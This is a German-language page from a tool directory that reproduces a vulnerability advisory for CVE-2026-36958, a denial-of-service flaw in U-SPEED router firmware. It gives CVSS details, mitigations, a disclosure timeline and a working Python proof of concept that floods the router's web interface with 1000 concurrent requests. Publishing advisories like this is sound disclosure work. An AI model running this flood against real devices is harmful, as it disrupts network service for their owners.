Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-36958 — Proof-of-Concept für CVE-2026-36958, eine Denial-of-Service-Schwachstelle in der U-SPEED-Router-Firmware, die über gleichzeitige HTTP-Anfragen Ressourcen erschöpft und dazu führt, dass die Weboberfläche nicht mehr reagiert. | Kitploit
Tools/GitHubGitHub/kirubel-cve/cve-2026-36958
SchwachstellenanalyseExploitationWebsicherheitNetzwerksicherheitPenetrationstests
GitHubkirubel-cve/cve-2026-36958

CVE-2026-36958

Proof-of-Concept für CVE-2026-36958, eine Denial-of-Service-Schwachstelle in der U-SPEED-Router-Firmware, die über gleichzeitige HTTP-Anfragen Ressourcen erschöpft und dazu führt, dass die Weboberfläche nicht mehr reagiert.

Repository anzeigen
12vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-36958: Denial of Service durch gleichzeitige HTTP-Anfragen

CVE-ID: CVE-2026-36958 Datum: 2026-04-29 Entdecker: Kirubel Solomne Hersteller: U-SPEED Produkt: U-SPEED Router Firmware-Version: V1.0.0 CWE: CWE-400 - Unkontrollierte Ressourcennutzung


Beschreibung

Die Firmware V1.0.0 des U-SPEED Routers ist anfällig für Denial of Service. Durch das Senden einer großen Anzahl gleichzeitiger HTTP-Anfragen an zufällige oder nicht existierende Endpunkte der Webverwaltungsoberfläche kann ein Angreifer die Systemressourcen des eingebetteten Boa-HTTP-Servers erschöpfen. Dies führt dazu, dass die Weboberfläche des Routers nicht mehr reagiert und möglicherweise ein manueller Neustart erforderlich ist, um den normalen Betrieb wiederherzustellen.


CVSS-Score

CVSS v3.1 Score: 7.5 (Hoch) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MetrikWert
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienKeine
BenutzerinteraktionKeine
Auswirkung auf VertraulichkeitKeine
Auswirkung auf IntegritätKeine
Auswirkung auf VerfügbarkeitHoch

Proof of Concept

import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router web interface is still responsive.")

Erwartetes Verhalten: Der Server sollte gleichzeitige Verbindungen ordnungsgemäß verarbeiten. Tatsächliches Verhalten: Die Weboberfläche reagiert nicht mehr; ein manueller Neustart ist erforderlich.


Auswirkungen

  • Die Webverwaltungsoberfläche wird unverfügbar
  • Mögliche Unterbrechung der Routing-Dienste
  • Manueller Neustart erforderlich, um die Funktionalität wiederherzustellen

Abhilfemaßnahmen

  • Implementierung einer Verbindungsratenbegrenzung auf dem Boa-Webserver
  • Begrenzung der maximalen gleichzeitigen Verbindungen pro Quell-IP
  • Hinzufügen eines automatischen Wiederherstellungs-/Watchdog-Mechanismus

Offenlegungszeitplan

DatumEreignis
2026-04-29Schwachstelle entdeckt
2026-04-29An MITRE gemeldet
2026-04-29CVE-2026-36958 zugewiesen
2026-04-29Öffentliche Offenlegung

Referenzen

  • MITRE CVE-2026-36958
  • CWE-400
  • Hersteller-Website
Tool herunterladen